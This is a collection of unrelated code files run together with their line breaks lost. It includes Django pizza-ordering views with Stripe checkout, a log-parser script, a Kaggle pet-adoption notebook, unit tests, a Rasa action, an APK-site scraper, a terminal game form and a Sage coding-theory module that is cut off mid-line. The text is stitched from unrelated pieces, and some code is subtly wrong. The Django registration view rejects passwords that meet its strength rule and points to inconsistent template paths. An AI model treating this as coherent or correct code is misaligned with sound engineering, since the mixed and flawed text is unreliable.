messages.error(request, "Username may not be left blank.") return render(request, "orders/register.html") elif User.objects.filter(username=username).exists(): messages.error(request, "Username is unavailabe.") return render(request, "orders/register.html") elif not email: messages.error(request, "Email may not be left blank.") return render(request, "orders/register.html") elif User.objects.filter(email=email).exists(): messages.error(request, "User with this email already exists.") return render(request, "orders/register.html") elif not password: messages.error(request, "Password may not be left blank.") return render(request, "orders/register.html") elif pattern.search(password) and len(password) >= 8: messages.error(request, "Password must be at least 8 characters; must contain at least one lowercase letter, one uppercase letter, one numeric digit, and one special character.") return render(request, "register.html") elif not confirmation: messages.error(request, "Confirm Password may not be left blank.") return render(request, "orders/register.html") elif password != confirmation: messages.error(request, "Passwords must match.") return render(request, "register.html") user = User.objects.create_user(username, email, password) user.first_name = first_name user.last_name = last_name user.save() login(request, user) return HttpResponseRedirect(reverse("index")) else: return render(request, "orders/register.html") def check(request): username = request.GET.get("username") email = request.GET.get("email") if username and User.objects.filter(username=username).exists(): return JsonResponse(False, safe=False) if email and User.objects.filter(email=email).exists(): return JsonResponse(False, safe=False) return JsonResponse(True, safe=False) def login_view(request): if request.method == 'POST': username = request.POST.get("username") password = request.POST.get("password") if not username: messages.error(request, "Username may not be left blank.") return render(request, "orders/login.html") elif not password: messages.error(request, "Password may not be left blank.") return render(request, "orders/login.html") user = authenticate(request, username=username, password=password) if not user: messages.error(request, "Invalid username and/or password.") return render(request, "orders/login.html") login(request, user) return HttpResponseRedirect(reverse("index")) else: return render(request, "orders/login.html") def logout_view(request): logout(request) messages.success(request, "Successfully logged out.") return HttpResponseRedirect(reverse("login_view")) def add_to_cart(request): item = request.POST.get("item") size = request.POST.get("size") toppings = request.POST.getlist("topping_ids") additions = request.POST.getlist("addition_ids") try: item_id = item.split("-")[-1] if item.startswith("reg-pizza"): item = RegularPizza.objects.get(pk=item_id) elif item.startswith("sic-pizza"): item = SicilianPizza.objects.get(pk=item_id) elif item.startswith("sub"): item = Sub.objects.get(pk=item_id) elif item.startswith("pasta"): item = Pasta.objects.get(pk=item_id) elif item.startswith("salad"): item = Salad.objects.get(pk=item_id) elif item.startswith("dinner-platter"): item = DinnerPlatter.objects.get(pk=item_id) else: raise ObjectDoesNotExist except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) if getattr(item, "sm_price", False): if size == "Small": price = item.sm_price elif size == "Large": price = item.lg_price else: messages.error(request, "Please choose a size.") return HttpResponseRedirect(reverse("index")) else: if size is None: price = item.price else: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) if getattr(item, "toppings", False): expected_toppings = 0 if item.name in ("1 topping", "1 item"): expected_toppings = 1 elif item.name in ("2 toppings", "2 items"): expected_toppings = 2 elif item.name in ("3 toppings", "3 items"): expected_toppings = 3 elif item.name == "Special": expected_toppings = 4 num_toppings = min(4, len(toppings)) if expected_toppings != num_toppings: messages.error(request, "Please select the correct number of toppings.") return HttpResponseRedirect(reverse("index")) for i, topping_id in enumerate(toppings): try: toppings[i] = Topping.objects.get(pk=topping_id) if toppings[i] not in item.toppings.all(): raise ObjectDoesNotExist except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) else: if len(toppings) > 0: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) if getattr(item, "additions", False): for i, addition_id in enumerate(additions): try: additions[i] = Addition.objects.get(pk=addition_id) if additions[i] in item.additions.all(): price += additions[i].price else: raise ObjectDoesNotExist except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) else: if len(additions) > 0: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) cart_item = CartItem( item=item, size=size, price=price, user=request.user ) cart_item.save() cart_item.toppings.set(toppings) cart_item.additions.set(additions) cart_item.save() return HttpResponseRedirect(reverse("index")) def cart(request): if request.method == 'POST': cart_item_id = request.POST.get("cart_item_id") try: cart_item = CartItem.objects.get(pk=cart_item_id) except ObjectDoesNotExist: messages.error(request, "Invalid Data.") return HttpResponseRedirect(reverse("index")) cart_item.delete() return HttpResponseRedirect(reverse("cart")) else: cart_items = CartItem.objects.filter( user=request.user, pending=False ) total_price = sum([cart_item.price for cart_item in cart_items]) return render(request, "orders/cart.html", { "cart_items": cart_items, "total_price": total_price }) def stripe_session(request): cart_items = CartItem.objects.filter( user=request.user, pending=False ) total_price = sum([cart_item.price for cart_item in cart_items]) session = stripe.checkout.Session.create( payment_method_types=["card"], line_items=[{ "price_data": { "currency": "usd", "product_data": { "name": "Pinocchio's Pizza & Subs", }, "unit_amount": int(total_price * 100), }, "quantity": 1, }], mode="payment", success_url=f"{DOMAIN}{HttpResponseRedirect(reverse('checkout')).url}?session_id={{CHECKOUT_SESSION_ID}}", cancel_url=f"{DOMAIN}{HttpResponseRedirect(reverse('cart')).url}" ) return JsonResponse({ "session_id": session.id, "stripe_public_key": STRIPE_PUBLIC_KEY }) def checkout(request): cart_items = CartItem.objects.filter( user=request.user, pending=False ) total_price = sum([cart_item.price for cart_item in cart_items]) order = Order( user=request.user, total_price=total_price ) order.save() for cart_item in cart_items: cart_item.order = order cart_item.pending = True cart_item.save() messages.success(request, "Order successfully submitted!") return HttpResponseRedirect(reverse("index")) def orders(request): cart_items = CartItem.objects.filter( user=request.user, pending=False ) current_orders = Order.objects.filter( user=request.user, complete=False ) past_orders = Order.objects.filter( user=request.user, complete=True ) return render(request, "orders/orders.html", { "cart_items": cart_items, "current_orders": current_orders, "past_orders": past_orders }) WuJialei/logparser0 #!/usr/bin/env python # -*- coding: UTF-8 -*- import sys import time, threading sys.path.append('../') from logparser import Drain input_dir = '../logs/test/' # The input directory of log file output_dir = 'Drain_test_result/' # The output directory of parsing results ''' 0: access.log #/apache2 ' ' 1: cinder_error.log #/apache2 ' ' 2: error.log.1 #/apache2 ' ' 3: keystone_access.log #/apache2 ' ' 4: nova_placement_access.log #/apache2 ' ' 5: nova_placement_error.log.1 #/apache2 ' ' ''' log_files = ['access.log', 'cinder_error.log', 'error.log.1', 'keystone_access.log', 'nova_placement_access.log', 'nova_placement_error.log.1'] # The input log file name log_formats = [' ', ' ', ' ', ' ', ' ', ' '] # HDFS log format cnt = 6 # Regular expression list for optional preprocessing (default: []) regex = [ r'blk_(|-)[0-9]+' , # block id r'(/|)([0-9]+\.){3}[0-9]+(:[0-9]+|)(:|)', # IP r'(?<=[^A-Za-z0-9])(\-?\+?\d+)(?=[^A-Za-z0-9])|[0-9]+$', # Numbers ] st = 0.5 # Similarity threshold depth = 4 # Depth of all leaf nodes #call LogParser def call_logParser(n, in_dir, out_dir, dep, st_v, rex_v): parser = Drain.LogParser(log_formats[n], indir=in_dir, outdir=out_dir, depth=dep, st=st_v, rex=rex_v) parser.parse(log_files[n]) for i in range(cnt): t = threading.Thread(target=call_logParser, args=(i, input_dir, output_dir, depth, st, regex), name='{}_{}'.format('thread', log_files[i])) t.start() #!/usr/bin/env python3 ''' A starting point for a program ''' import sys import logging import time import argparse from sqlalchemy.orm.exc import NoResultFound from myapp.util import session, dbinit, setuplogging from myapp.config import loadconf, Config if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--conf_location", help="Location for configuration files") args = parser.parse_args() conf_location = './myapp/etc/' if args.conf_location: conf_location = args.conf_location loadconf(conf_location) setuplogging(conf_location) dbinit() import myapp.models as model logger = logging.getLogger('program') logger.info('Starting program.py') some_config = Config.CONF.get('something', 'some_config') while True: logger.debug('Get session') ses = session() try: logger.debug('Load something from the database') uploads = ses.query(model.Something).all() except NoResultFound: logger.error('Could not query somethings') sys.exit(1) logger.debug('Close session and sleep') ses.commit() ses.close() time.sleep(10) # --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: percent # format_version: '1.2' # jupytext_version: 1.0.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %% {"_uuid": "8f2839f25d086af736a60e9eeb907d3b93b6e0e5", "_cell_guid": "b1076dfc-b9ad-4769-8c92-a6c4dae69d19"} import numpy as np import pandas as pd import os import xgboost as xgb from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.preprocessing import LabelEncoder from scipy import sparse from sklearn.decomposition import TruncatedSVD from sklearn.model_selection import train_test_split, KFold, StratifiedKFold import scipy as sp from sklearn import linear_model from functools import partial from sklearn import metrics from collections import Counter import json import lightgbm as lgb # %% {"_uuid": "77161d0931b6ce8d627967c419f813ccf4c859f8"} # The following 3 functions have been taken from ner's github repository # https://github.com/benhamner/Metrics def confusion_matrix(rater_a, rater_b, min_rating=None, max_rating=None): """ Returns the confusion matrix between rater's ratings """ assert(len(rater_a) == len(rater_b)) if min_rating is None: min_rating = min(rater_a + rater_b) if max_rating is None: max_rating = max(rater_a + rater_b) num_ratings = int(max_rating - min_rating + 1) conf_mat = [[0 for i in range(num_ratings)] for j in range(num_ratings)] for a, b in zip(rater_a, rater_b): conf_mat[a - min_rating][b - min_rating] += 1 return conf_mat def histogram(ratings, min_rating=None, max_rating=None): """ Returns the counts of each type of rating that a rater made """ if min_rating is None: min_rating = min(ratings) if max_rating is None: max_rating = max(ratings) num_ratings = int(max_rating - min_rating + 1) hist_ratings = [0 for x in range(num_ratings)] for r in ratings: hist_ratings[r - min_rating] += 1 return hist_ratings def quadratic_weighted_kappa(y, y_pred): """ Calculates the quadratic weighted kappa axquadratic_weighted_kappa calculates the quadratic weighted kappa value, which is a measure of inter-rater agreement between two raters that provide discrete numeric ratings. Potential values range from -1 (representing complete disagreement) to 1 (representing complete agreement). A kappa value of 0 is expected if all agreement is due to chance. quadratic_weighted_kappa(rater_a, rater_b), where rater_a and rater_b each correspond to a list of integer ratings. These lists must have the same length. The ratings should be integers, and it is assumed that they contain the complete range of possible ratings. quadratic_weighted_kappa(X, min_rating, max_rating), where min_rating is the minimum possible rating, and max_rating is the maximum possible rating """ rater_a = y rater_b = y_pred min_rating=None max_rating=None rater_a = np.array(rater_a, dtype=int) rater_b = np.array(rater_b, dtype=int) assert(len(rater_a) == len(rater_b)) if min_rating is None: min_rating = min(min(rater_a), min(rater_b)) if max_rating is None: max_rating = max(max(rater_a), max(rater_b)) conf_mat = confusion_matrix(rater_a, rater_b, min_rating, max_rating) num_ratings = len(conf_mat) num_scored_items = float(len(rater_a)) hist_rater_a = histogram(rater_a, min_rating, max_rating) hist_rater_b = histogram(rater_b, min_rating, max_rating) numerator = 0.0 denominator = 0.0 for i in range(num_ratings): for j in range(num_ratings): expected_count = (hist_rater_a[i] * hist_rater_b[j] / num_scored_items) d = pow(i - j, 2.0) / pow(num_ratings - 1, 2.0) numerator += d * conf_mat[i][j] / num_scored_items denominator += d * expected_count / num_scored_items return (1.0 - numerator / denominator) # %% {"_uuid": "f9c15a9a24576fb4c720fb4fd9db4600220896d0"} class OptimizedRounder(object): def __init__(self): self.coef_ = 0 def _kappa_loss(self, coef, X, y): X_p = np.copy(X) for i, pred in enumerate(X_p): if pred < coef[0]: X_p[i] = 0 elif pred >= coef[0] and pred < coef[1]: X_p[i] = 1 elif pred >= coef[1] and pred < coef[2]: X_p[i] = 2 elif pred >= coef[2] and pred < coef[3]: X_p[i] = 3 else: X_p[i] = 4 ll = quadratic_weighted_kappa(y, X_p) return -ll def fit(self, X, y): loss_partial = partial(self._kappa_loss, X=X, y=y) initial_coef = [0.5, 1.5, 2.5, 3.5] self.coef_ = sp.optimize.minimize(loss_partial, initial_coef, method='nelder-mead') def predict(self, X, coef): X_p = np.copy(X) for i, pred in enumerate(X_p): if pred < coef[0]: X_p[i] = 0 elif pred >= coef[0] and pred < coef[1]: X_p[i] = 1 elif pred >= coef[1] and pred < coef[2]: X_p[i] = 2 elif pred >= coef[2] and pred < coef[3]: X_p[i] = 3 else: X_p[i] = 4 return X_p def coefficients(self): return self.coef_['x'] # %% {"_cell_guid": "79c7e3d0-c299-4dcb-8224-4455121ee9b0", "_uuid": "d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"} train = pd.read_csv('../input/train/train.csv') test = pd.read_csv('../input/test/test.csv') # %% {"_uuid": "b8d7ffdf6906478c6ba00bd26405088eb8a36656"} # train[train.AdoptionSpeed==0] # %% {"_uuid": "3b4da8ff030a20a7daaa73ea910adc106d75f95f"} doc_sent_mag = [] doc_sent_score = [] nf_count = 0 for pet in train.PetID.values: try: with open('../input/train_sentiment/' + pet + '.json', 'r') as f: sentiment = json.load(f) doc_sent_mag.append(sentiment['documentSentiment']['magnitude']) doc_sent_score.append(sentiment['documentSentiment']['score']) except FileNotFoundError: nf_count += 1 doc_sent_mag.append(-1) doc_sent_score.append(-1) # %% {"_uuid": "936005439ef1387902251657bc9c81cd834ca68d"} train['doc_sent_mag'] = doc_sent_mag train['doc_sent_score'] = doc_sent_score # %% {"_uuid": "f33296918b38649dd1cf0bf209e5295b958de7cd"} nf_count # %% {"_uuid": "b0736bd6f47b95d965908c236d7f0e6e3b6c4a0d"} doc_sent_mag = [] doc_sent_score = [] nf_count = 0 for pet in test.PetID.values: try: with open('../input/test_sentiment/' + pet + '.json', 'r') as f: sentiment = json.load(f) doc_sent_mag.append(sentiment['documentSentiment']['magnitude']) doc_sent_score.append(sentiment['documentSentiment']['score']) except FileNotFoundError: nf_count += 1 doc_sent_mag.append(-1) doc_sent_score.append(-1) # %% {"_uuid": "99f80c6f98c101f4648cf1ab2c9af1de56862ef6"} test['doc_sent_mag'] = doc_sent_mag test['doc_sent_score'] = doc_sent_score # %% {"_uuid": "d963f18679dd3e13de5697bc94ec55a334695db5"} nf_count # %% {"_uuid": "c354ed2372c7b019755376d6c3a004b2223f78b2"} lbl_enc = LabelEncoder() lbl_enc.fit(train.RescuerID.values.tolist() + test.RescuerID.values.tolist()) train.RescuerID = lbl_enc.transform(train.RescuerID.values) test.RescuerID = lbl_enc.transform(test.RescuerID.values) # %% {"_uuid": "228b9ac44451329b2abca99629b859955666262c"} train_desc = train.Description.fillna("none").values test_desc = test.Description.fillna("none").values tfv = TfidfVectorizer(min_df=3, max_features=None, strip_accents='unicode', analyzer='word', token_pattern=r'\w{1,}', ngram_range=(1, 3), use_idf=1, smooth_idf=1, sublinear_tf=1, stop_words = 'english') # Fit TFIDF tfv.fit(list(train_desc) + list(test_desc)) X = tfv.transform(train_desc) X_test = tfv.transform(test_desc) svd = TruncatedSVD(n_components=180) svd.fit(X) X = svd.transform(X) X_test = svd.transform(X_test) # %% {"_uuid": "612000ae8312b3f78698a41add1787c528617132"} y = train.AdoptionSpeed # %% {"_uuid": "287d378245614e0d7a2bbe4b7979681dc89587dc"} y.value_counts() # %% {"_uuid": "b3f01cfee25b40d08a1bebb306aa280c8c0d975b"} train = np.hstack((train.drop(['Name', 'Description', 'PetID', 'AdoptionSpeed'], axis=1).values, X)) test = np.hstack((test.drop(['Name', 'Description', 'PetID'], axis=1).values, X_test)) # %% {"_uuid": "c63c99a4f66179cf71ac0ca1c484881796f2bd5f"} train_predictions = np.zeros((train.shape[0], 1)) test_predictions = np.zeros((test.shape[0], 1)) zero_test_predictions = np.zeros((test.shape[0], 1)) FOLDS = 3 print("stratified k-folds") skf = StratifiedKFold(n_splits=FOLDS, random_state=42, shuffle=True) skf.get_n_splits(train, y) cv_scores = [] fold = 1 coefficients = np.zeros((FOLDS, 4)) for train_idx, valid_idx in skf.split(train, y): xtrain, xvalid = train[train_idx], train[valid_idx] xtrain_text, xvalid_text = X[train_idx], X[valid_idx] ytrain, yvalid = y.iloc[train_idx], y.iloc[valid_idx] w = y.value_counts() weights = {i : np.sum(w) / w[i] for i in w.index} print(weights) #model = xgb.XGBRegressor(n_estimators=500, nthread=-1, max_depth=19, learning_rate=0.01, min_child_weight = 150, colsample_bytree=0.8) lgb_params = { 'boosting_type': 'gbdt', 'objective': 'regression', 'learning_rate': 0.005, 'subsample': .8, 'colsample_bytree': 0.8, 'min_split_gain': 0.006, 'min_child_samples': 150, 'min_child_weight': 0.1, 'max_depth': 17, 'n_estimators': 10000, 'num_leaves': 80, 'silent': -1, 'verbose': -1, 'max_depth': 11, 'random_state': 2018 } model = lgb.LGBMRegressor(**lgb_params) model.fit( xtrain, ytrain, eval_set=[(xvalid, yvalid)], eval_metric='rmse', verbose=100, early_stopping_rounds=100 ) #model.fit(xtrain, ytrain) valid_preds = model.predict(xvalid, num_iteration=model.best_iteration_) optR = OptimizedRounder() optR.fit(valid_preds, yvalid.values) coefficients[fold-1,:] = optR.coefficients() valid_p = optR.predict(valid_preds, coefficients[fold-1,:]) print("Valid Counts = ", Counter(yvalid.values)) print("Predicted Counts = ", Counter(valid_p)) test_preds = model.predict(test, num_iteration=model.best_iteration_) scr = quadratic_weighted_kappa(yvalid.values, valid_p) cv_scores.append(scr) print("Fold = {}. QWK = {}. Coef = {}".format(fold, scr, coefficients[fold-1,:])) print("\n") train_predictions[valid_idx] = valid_preds.reshape(-1, 1) test_predictions += test_preds.reshape(-1, 1) fold += 1 test_predictions = test_predictions * 1./FOLDS print("Mean Score: {}. Std Dev: {}. Mean Coeff: {}".format(np.mean(cv_scores), np.std(cv_scores), np.mean(coefficients, axis=0))) # %% {"_uuid": "1cf0f817ff7048f4d77d2f153d9fdbb0fb98a237"} # %% {"_uuid": "13e0e8cde2f271c6783b87b0ff44b63a284169c6"} optR = OptimizedRounder() train_predictions = np.array([item for sublist in train_predictions for item in sublist]) optR.fit(train_predictions, y) coefficients = optR.coefficients() print(quadratic_weighted_kappa(y, optR.predict(train_predictions, coefficients))) predictions = optR.predict(test_predictions, coefficients).astype(int) predictions = [item for sublist in predictions for item in sublist] # %% {"_uuid": "4604b0219c467ee0bfe18a4491463fba7e04779e"} sample = pd.read_csv('../input/test/sample_submission.csv') # %% {"_uuid": "da9b6b80b21ddeabfcef556a6cb65f38ae675b2b"} sample.AdoptionSpeed = predictions # %% {"_uuid": "bfc98b6c249a187cfe25cdb4448382325166f3f4"} sample.to_csv('submission.csv', index=False) # %% {"_uuid": "87392765ce9a0b7dc1426323bf7be8d8aad230c5"} sample.dtypes # %% {"_uuid": "d920a49d4554faa12474b9fa6759c9aa1ee6931c"} sample.AdoptionSpeed.value_counts() # %% {"_uuid": "17004d159a6e1a67620d2b2b9126e36e243e7e9d"} sample.head() # %% {"_uuid": "1848ae9e76e383e911f0f760895722d9d8e91953"} # %% {"_uuid": "0b4d3079f7d08aee467992f5be7e65bf7d6da045"} ivan-yosifov88/python_oop_june_2021 import unittest from project.player.beginner import Beginner class TestBeginner(unittest.TestCase): def test_init_method__when_all_correct__should_set(self): beginner = Beginner("Test") self.assertEqual("Test", beginner.username) self.assertEqual(50, beginner.initial_points) def test_username__when_empty_should_raise_ValueError(self): with self.assertRaises(ValueError) as message: beginner = Beginner("") self.assertEqual("Player's username cannot be an empty string.", str(message.exception)) def test_health__when_value_is_less_than_0__should_raise_ValueError(self): beginner = Beginner("Test") with self.assertRaises(ValueError) as message: beginner.health = -1 self.assertEqual("Player's health bonus cannot be less than zero.", str(message.exception)) def test_take_damage__when_points_are_less_than_0__should_raise_ValueError(self): damage_points = -1 beginner = Beginner("Test") with self.assertRaises(ValueError) as message: beginner.take_damage(damage_points) self.assertEqual("Damage points cannot be less than zero.", str(message.exception)) def test_take_damage__when_points_are_greater_than_0__should_decrease_health(self): damage_points = 5 beginner = Beginner("Test") beginner.take_damage(damage_points) self.assertEqual(45, beginner.health) def test_is_dead_property__when_health_is_greater_than_zero__should_return_False(self): beginner = Beginner("Test") damage_points = 5 beginner.take_damage(damage_points) self.assertFalse(beginner.is_dead) if __name__ == "__main__": unittest.main() class Solution: def XXX(self, height: List[int]) -> int: l, r, res = 0, len(height) - 1, 0 while l < r: res = max(res, min(height[l], height[r]) * (r - l)) if height[l] < height[r]: i = l + 1 while i < r and height[i] <= height[l]: i += 1 l = i else: j = r - 1 while j > l and height[j] <= height[r]: j -= 1 r = j return res undefined for (i = 0; i < document.getElementsByTagName("code").length; i++) { console.log(document.getElementsByTagName("code")[i].innerText); } # This files contains your custom actions which can be used to run # custom Python code. # # See this guide on how to implement these action: # https://rasa.com/docs/rasa/core/actions/#custom-actions/ # This is a simple example for a custom action which utters "Hello World!" from typing import Any, Text, Dict, List from rasa_sdk import Action, Tracker from rasa_sdk.executor import CollectingDispatcher timezones = { "London": "UTC+1:00" } class ActionFindAndShowTimeZone(Action): def name(self) -> Text: return "action_find_and_show_time_zone" def run(self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any]) -> List[Dict[Text, Any]]: city = tracker.get_slot("city") timezone = timezones.get(city) if timezone is None: output = "Could not find the time zone for {}".format(city) else: output = "The time zone for {} is {}".format(city, timezone) dispatcher.utter_message(text=output) return [] 0 # -*- coding: utf-8 -*- # # Copyright (c) 2020~2999 - Cologler <> # ---------- # # ---------- from urllib.parse import quote, urlsplit from logging import Logger from bs4 import BeautifulSoup import progressbar import requests BASE_URL = "https://apkpure.com" class ApkPure: def __init__(self, logger: Logger) -> None: self._logger = logger def _get_soup(self, url: str): r = requests.get(url, timeout=30) return BeautifulSoup(r.content, features='html.parser') def _get_direct_download_url(self, dlpage_url: str): self._logger.debug(f'download page url: {dlpage_url}') soup = self._get_soup(dlpage_url) download_link = soup.select_one('#download_link') if download_link: download_url = download_link['href'] return download_url def _get_variants(self, variant_url: str): self._logger.debug(f'variants page url: {variant_url}') variants = [] soup = self._get_soup(variant_url) for row in soup.select('div.table-row'): if 'table-head' not in row['class']: cols = list(row.select('.table-cell')) variants.append(dict( arch=cols[1].text, url=BASE_URL+cols[4].select_one('a')['href'] )) self._logger.debug(f'found {len(variants)} variants: {[v["arch"] for v in variants]}.') return variants def _get_latest_version_info(self, versions_url: str): self._logger.debug(f'versions page url: {versions_url}') soup = self._get_soup(versions_url) for item in soup.select('.ver-wrap li a'): file_type = item.select_one('.ver-item-t').text.lower() # apk or xapk if file_type not in ('apk', 'xapk'): self._logger.warning(f'unknown file type: {file_type}.') if file_type == 'apk': version = item.select_one('.ver-item-n').text assert version[0] == 'V' version = version[1:] apk_page_url = BASE_URL + item['href'] scope = urlsplit(apk_page_url).path.split('/')[3] if scope == 'variant': variants = self._get_variants(apk_page_url) variant = ([v for v in variants if v['arch'] == 'armeabi-v7a']+[None])[0] assert variant, variants download_page_url = variant['url'] elif scope == 'download': download_page_url = apk_page_url else: self._logger.warning(f'unknown sub path: {scope}') continue download_url = self._get_direct_download_url(download_page_url) return dict( version=version, download_url=download_url ) def find_latest_package_info(self, name: str): url = f'{BASE_URL}/search?q={quote(name)}' soup = self._get_soup(url) a = soup.select_one('p.search-title a') if not a: self._logger.debug(f'no search result.') return None if not a['href'].endswith(name): self._logger.debug(f'no package match {name}') return None versions_url = BASE_URL + a['href'] + '/versions' return self._get_latest_version_info(versions_url) thmslmr/timebomb-client import npyscreen class CutForm(npyscreen.ActionForm): """Form display when user want to cut a card.""" CANCEL_BUTTON_TEXT = "CANCEL" OK_BUTTON_TEXT = "CUT" DEFAULT_COLUMNS = 60 DEFAULT_LINES = 12 def create(self): """Create Form.""" self.keypress_timeout = 1 self.center_on_display() self.name = "Who to cut ?" self.widgets = { "players": self.add( npyscreen.TitleSelectOne, scroll_exit=True, name="Players", values=range(7), ) } # HACK self.widgets["players"].entry_widget.cursor_line = 0 def while_waiting(self): """Use to display properly player names.""" if type(self.widgets["players"].values) is not list: targets = self.get_targets() self.widgets["players"].values = [t.name for t in targets] self.widgets["players"].update() def get_targets(self): """Get list of sorted (by name) potential targets. Returns: list: List of player objects. """ room_state = self.parentApp.state.room me_state = self.parentApp.state.me return sorted( [player for player in room_state.players if player.id != me_state.id], key=lambda item: item.name, ) def on_ok(self): """Emit cut event and switch form once ok is hit.""" value = self.widgets["players"].value if len(value) == 0: return targets = self.get_targets() target_id = [t.id for t in targets][value[0]] self.parentApp.sio.cut(target_id) self.parentApp.switchForm("GAME") def on_cancel(self): """Back to game form.""" self.parentApp.switchForm("GAME") r""" Gabidulin Code This module provides the :class:`~sage.coding.gabidulin.GabidulinCode`, which constructs Gabidulin Codes that are the rank metric equivalent of Reed Solomon codes and are defined as the evaluation codes of degree-restricted skew polynomials. This module also provides :class:`~sage.coding.gabidulin.GabidulinPolynomialEvaluationEncoder`, an encoder with a skew polynomial message space and :class:`~sage.coding.gabidulin.GabidulinVectorEvaluationEncoder`, an encoder based on the generator matrix. It also provides a decoder :class:`~sage.coding.gabidulin.GabidulinGaoDecoder` which corrects errors using the Gao algorithm in the rank metric. AUTHOR: - (2016-08-16) - (2019-08-19): initial version """ from sage.matrix.constructor import matrix from sage.modules.free_module_element import vector from sage.coding.encoder import Encoder from sage.coding.decoder import Decoder, DecodingError from sage.coding.linear_rank_metric import AbstractLinearRankMetricCode from sage.categories.fields import Fields class GabidulinCode(AbstractLinearRankMetricCode): """ A Gabidulin Code. DEFINITION: A linear Gabidulin code Gab[n, k] over `F_{q^m}` of length `n` (at most `m`) and dimension `k` (at most `n`) is the set of all codewords, that are the evaluation of a `q`-degree restricted skew polynomial `f(x)` belonging to the skew polynomial constructed over the base ring `F_{q^m}` and the twisting homomorphism `\sigma`. .. math:: \{ \text{Gab[n, k]} = \big\{ (f(g_0) f(g_1) ... f(g_{n-1})) = f(\textbf{g}) : \text{deg}_{q}f(x) < k \big\} \} where the fixed evaluation points `g_0, g_1,..., g_{n-1}` are linearly independent over `F_{q^m}`. EXAMPLES: A Gabidulin Code can be constructed in the following way: sage: Fqm = GF(16) sage: Fq = GF(4) sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq) sage: C [2, 2, 1] linear Gabidulin code over GF(16)/GF(4) """ _registered_encoders = {} _registered_decoders = {} def __init__(self, base_field, length, dimension, sub_field=None, twisting_homomorphism=None, evaluation_points=None): r""" Representation of a Gabidulin Code. INPUT: - ``base_field`` -- finite field of order `q^m` where `q` is a prime power and `m` is an integer - ``length`` -- length of the resulting code - ``dimension`` -- dimension of the resulting code - ``sub_field`` -- (default: ``None``) finite field of order `q` which is a subfield of the ``base_field``. If not given, it is the prime subfield of the ``base_field``. - ``twisting_homomorphism`` -- (default: ``None``) homomorphism of the underlying skew polynomial ring. If not given, it is the Frobenius endomorphism on ``base_field``, which sends an element `x` to `x^{q}`. - ``evaluation_points`` -- (default: ``None``) list of elements `g_0, g_1,...,g_{n-1}` of the ``base_field`` that are linearly independent over the ``sub_field``. These elements form the first row of the generator matrix. If not specified, these are the `nth` powers of the generator of the ``base_field``. Both parameters ``sub_field`` and ``twisting_homomorphism`` are optional. Since they are closely related, here is a complete list of behaviours: - both ``sub_field`` and ``twisting_homomorphism`` given -- in this case we only check that given that ``twisting_homomorphism`` has a fixed field method, it returns ``sub_field`` - only ``twisting_homomorphism`` given -- we set ``sub_field`` to be the fixed field of the ``twisting_homomorphism``. If such method does not exist, an error is raised. - only ``sub_field`` given -- we set ``twisting_homomorphism`` to be the Frobenius of the field extension - neither ``sub_field`` or ``twisting_homomorphism`` given -- we take ``sub_field`` to be the prime field of ``base_field`` and the ``twisting_homomorphism`` to be the Frobenius wrt. the prime field TESTS: If ``length`` is bigger than the degree of the extension, an error is raised:: sage: C = codes.GabidulinCode(GF(64), 4, 3, GF(4)) Traceback (most recent call last): ... ValueError: 'length' can be at most the degree of the extension, 3 If the number of evaluation points is not equal to the length of the code, an error is raised: sage: Fqm = GF(5^20) sage: Fq = GF(5) sage: aa = Fqm.gen() sage: evals = [ aa^i for i in range(21) ] sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq, None, evals) Traceback (most recent call last): ... ValueError: the number of evaluation points should be equal to the length of the code If evaluation points are not linearly independent over the ``base_field``, an error is raised: sage: evals = [ aa*i for i in range(2) ] sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq, None, evals) Traceback (most recent call last): ... ValueError: the evaluation points provided are not linearly independent If an evaluation point does not belong to the ``base_field``, an error is raised: sage: a = GF(3).gen() sage: evals = [ a*i for i in range(2) ] sage: C = codes.GabidulinCode(Fqm, 2, 2, Fq, None, evals) Traceback (most recent call last): ... ValueError: evaluation point does not belong to the 'base field' Given that both ``sub_field`` and ``twisting_homomorphism`` are specified and ``twisting_homomorphism`` has a fixed field method. If the fixed field of ``twisting_homomorphism`` is not ``sub_field``, an error is raised: sage: Fqm = GF(64) sage: Fq = GF(8) sage: twist = GF(64).frobenius_endomorphism(n=2) sage: C = codes.GabidulinCode(Fqm, 3, 2, Fq, twist) Traceback (most recent call last): ... ValueError: the fixed field of the twisting homomorphism has to be the relative field of the extension If ``twisting_homomorphism`` is given, but ``sub_field`` is not. In case ``twisting_homomorphism`` does not have a fixed field method, and error is raised: sage: Fqm. = GF(64) sage: sigma = Hom(Fqm, Fqm)[1]; sigma Ring endomorphism of Finite Field in z6 of size 2^6 Defn: z6 |--> z6^2 sage: C = codes.GabidulinCode(Fqm, 3, 2, None, sigma) Traceback (most recent call last): ... ValueError: if 'sub_field' is not given, the twisting homomorphism has to have a 'fixed_field' method """ twist_fix_field = None have_twist = (twisting_homomorphism != None) have_subfield = (sub_field != None) if have_twist and have_subfield: try: twist_fix_field = twisting_homomorphism.fixed_field()[0] except AttributeError: pass if twist_fix_field and twist_fix_field.order() != sub_field.order(): raise ValueError("the fixed field of the twisting homomorphism has to be the relative field of the extension") if have_twist and not have_subfield: if not twist_fix_field: raise ValueError("if 'sub_field' is not given, the twisting homomorphism has to have a 'fixed_field' method") else: sub_field = twist_fix_field if (not have_twist) and have_subfield: twisting_homomorphism = base_field.frobenius_endomorphism(n=sub_field.degree()) if (not have_twist) and not have_subfield: sub_field = base_field.base_ring() twisting_homomorphism = base_field.frobenius_endomorphism() self._twisting_homomorphism = twisting_homomorphism super(GabidulinCode, self).__init__(base_field, sub_field, length, "VectorEvaluation", "Gao") if length > self.extension_degree(): raise ValueError("'length' can be at most the degree of the extension, {}".format(self.extension_degree())) if evaluation_points is None: evaluation_points = 